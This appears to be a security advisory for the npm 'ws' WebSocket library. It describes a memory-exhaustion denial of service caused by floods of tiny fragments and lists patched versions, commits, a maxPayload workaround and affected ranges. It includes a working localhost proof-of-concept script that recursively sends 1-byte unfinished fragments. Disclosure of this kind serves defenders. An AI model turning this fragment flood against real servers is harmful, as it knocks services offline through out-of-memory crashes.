ws: Memory exhaustion DoS from tiny fragments and data chunks
🔗 CVE IDs covered (1)
📋 Description
Impact
A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.
Proof of concept
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(`ws://localhost:${port}`);
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(`client close - code: ${code} reason: ${reason.toString()}`);
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(`server close - code: ${code} reason: ${reason.toString()}`);
});
});
Patches
The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to [email protected] (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), [email protected] (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and [email protected] (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).
Workarounds
In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.
Credits
The vulnerability was responsibly disclosed and fixed by Nadav Magier.
🎯 Affected products4
- npm/ws:>= 1.1.0, < 5.2.5
- npm/ws:>= 6.0.0, < 6.2.4
- npm/ws:>= 7.0.0, < 7.5.11
- npm/ws:>= 8.0.0, < 8.21.0
🔗 References (6)
- https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p
- https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7
- https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53
- https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94
- https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8
- https://github.com/advisories/GHSA-96hv-2xvq-fx4p